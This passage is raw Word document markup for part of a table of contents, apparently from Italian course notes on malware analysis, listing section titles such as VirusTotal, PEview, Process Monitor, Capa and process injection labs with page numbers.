            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.7 Mitre ATT&amp;CK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165810 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40696F6A" w14:textId="628DF591"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11" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.8 Persistenza</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165811 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27E3FC8B" w14:textId="648D885D" w:rsidR="00FA611D" w:rsidRDefault="00FA611D">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc140165812" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6. Basic Malware Analysis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165812 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="705C1B76" w14:textId="22F56CB1"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13" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1 Questionario Lab01-01.exe e Lab01-01.dll</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165813 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18967C33" w14:textId="5D3CA1F0"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14" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2 VirusTotal</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165814 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60276D98" w14:textId="7DC38A79"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15" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.3 PEview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165815 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63A43B7B" w14:textId="67DB1BA9"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16" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.4 PEiD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165816 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E8AC0AA" w14:textId="5CB0F444"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17" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.5 BinText</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165817 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C0E1194" w14:textId="529E6B5F"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18" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.6 Dependency Walker</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165818 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62C509BE" w14:textId="286E8B49"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19" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.6 Extra Lab-01-04</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165819 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C13B9F5" w14:textId="247948D0"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0" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.6 Keylogger</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165820 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BD1B01D" w14:textId="23143234"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1" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.7 Process Explorer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165821 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="165E26A6" w14:textId="0AA1EDFB"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2" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.8 Process Monitor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165822 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34FD672D" w14:textId="36CC1902"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3" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.9 Persistenza</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165823 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="786BFE03" w14:textId="0C999F22"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4" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.10 Key12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165824 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>59</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61FCC308" w14:textId="5F0E5E1B"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5" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.11 Traffico DNS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165825 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38D2F32E" w14:textId="110E6686"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6" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.12 Capa</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165826 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0FC80D6C" w14:textId="054284E0" w:rsidR="00FA611D" w:rsidRDefault="00FA611D">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc140165827" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7. Analyzing Windows Malware</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165827 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08B79652" w14:textId="22920ABC"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8" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.1 Secret Flags</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165828 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="060E701B" w14:textId="629945BA"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29" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.2 Extra task</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165829 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72EF64A4" w14:textId="513AF501"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30" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.3 Lab07-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165830 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>82</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64F4E78E" w14:textId="7F699716"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31" w:history="1">
            <w:r w:rsidRPr="00D33431">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.4 Process Injection Lab12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc140165831 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
